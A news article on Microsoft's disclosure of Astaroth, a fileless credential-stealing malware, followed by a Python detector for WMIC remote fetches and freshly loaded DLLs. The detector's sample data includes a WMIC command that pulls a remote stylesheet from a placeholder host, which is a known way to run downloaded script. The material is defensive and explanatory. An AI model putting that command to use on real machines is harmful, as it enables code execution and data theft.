'Great Duke Of Hell' DLL Malware Attack Uncovers Vicious Astaroth Fileless Malware Threat

Microsoft recently lifted the veil on Astaroth, one very unpleasant piece of fileless malware that steals data without ever being installed on a victim's machine.

Named after a demon of the same name straight from the occult books 'Ars Goetia' and 'The Key of Solomon', said to seduce his victims through vanity and laziness, this malware has been in circulation ever since 2017. It was mostly used to steal data from South American and European companies in targeted attacks that used spear phishing as a point of entry.

According to Microsoft Defender ATP researcher Andrea Lelli, what makes this specific infection unique is its ability to slip stealthily past the detection methods of some traditional antivirus programs.

According to Lelli, Astaroth is notorious for stealing personal credentials, keylogging and more; the harvested data is then exfiltrated to a remote server. The attackers then use the data for financial theft, selling personal information to other criminals or even moving laterally across networks.

How Astaroth Infects Systems

The attack usually starts when a victim opens a link inside a spear-phishing email, the social engineering tool the attackers use as their point of entry. The link leads to a shortcut file that launches terminal commands, which in turn download and run the JavaScript code that makes the infection possible. The script downloads and runs two DLL files that handle the logging and uploading of harvested information, all the while pretending to be legitimate system processes.

The procedure works well against signature-based detection tools, since nothing but the DLL files gets downloaded or installed, leaving little chance to scan for and catch the attack in progress. This approach has allowed Astaroth to fly under the radar and thrive online since late 2017 without the usual reliance on trojan downloaders or vulnerability exploits.

Fileless Malware Detection Measures

According to Lelli, traditional file-centric antivirus solutions have only one chance to detect the attack: during the download of the two DLL files, since the executables used in the attack are considered non-malicious. The DLLs use code obfuscation and vary between campaigns, which means focusing detection on those two alone would be 'a vicious trap', Lelli added.

Microsoft and other vendors have had to rely on heuristic detection tools, such as those that closely watch for the use of WMIC command-line code and apply rules whenever DLL files are loaded. Checking a file's age, blocking newly created DLLs from running and similar tactics allow newer security tools to catch up with fileless malware.
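As an added illustration of the two heuristics the text describes (not code from Microsoft or from the original article), here is a small Python detector run over constructed process-creation, file-creation and image-load log lines. It flags WMIC launched with a remote URL on its command line and any DLL loaded within a few minutes of being written to disk; the log format, the process paths and the ten-minute "newly created" window are assumptions for the example.

```python
"""Toy detector for two Astaroth-style signals: WMIC pulling a remote resource,
and a DLL loaded shortly after it appeared on disk. Everything below is
constructed for this example; the event format is hypothetical."""
from datetime import datetime, timedelta
import re

# Constructed sample telemetry: "<ISO timestamp> key=value key="quoted value" ...".
SAMPLE_EVENTS = [
    '2019-07-08T10:00:01 type=process_create image=C:\\Windows\\System32\\wmic.exe '
    'cmdline="wmic os get /format:https://example.invalid/a.xsl"',
    '2019-07-08T10:00:05 type=file_create path=C:\\Users\\Public\\x.dll',
    '2019-07-08T10:00:20 type=image_load image=C:\\Users\\Public\\host.exe '
    'path=C:\\Users\\Public\\x.dll',
    '2019-07-08T10:05:00 type=process_create image=C:\\Windows\\System32\\wmic.exe '
    'cmdline="wmic os get caption"',
    '2019-07-08T11:00:00 type=image_load image=C:\\Windows\\explorer.exe '
    'path=C:\\Windows\\System32\\shell32.dll',
]

EVENT_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')   # key="quoted" or key=bare
URL_RE = re.compile(r'https?://', re.IGNORECASE)
FRESH_DLL_WINDOW = timedelta(minutes=10)  # assumption: what counts as "newly created"


def parse_event(line):
    """Split one log line into a dict of fields plus a parsed 'ts' datetime."""
    ts_text, _, rest = line.partition(" ")
    fields = {key: quoted or bare for key, quoted, bare in EVENT_RE.findall(rest)}
    fields["ts"] = datetime.fromisoformat(ts_text)
    return fields


def analyze(lines):
    """Return (rule, detail) alerts for the events in order of appearance."""
    alerts = []
    created = {}  # lowercased DLL path -> time it was written to disk
    for ev in map(parse_event, lines):
        kind = ev.get("type")
        image = ev.get("image", "").lower()
        path = ev.get("path", "").lower()
        if kind == "process_create" and image.endswith("wmic.exe"):
            # Heuristic 1: WMIC asked to fetch something over the network.
            if URL_RE.search(ev.get("cmdline", "")):
                alerts.append(("wmic_remote_resource", ev["cmdline"]))
        elif kind == "file_create" and path.endswith(".dll"):
            created[path] = ev["ts"]
        elif kind == "image_load":
            # Heuristic 2: DLL age check; a just-written DLL being loaded is suspect.
            born = created.get(path)
            if born is not None and ev["ts"] - born <= FRESH_DLL_WINDOW:
                alerts.append(("fresh_dll_load", ev["path"]))
    return alerts
```

A real deployment would take file creation time from the filesystem or EDR metadata rather than from an earlier log line, but the age comparison is the same.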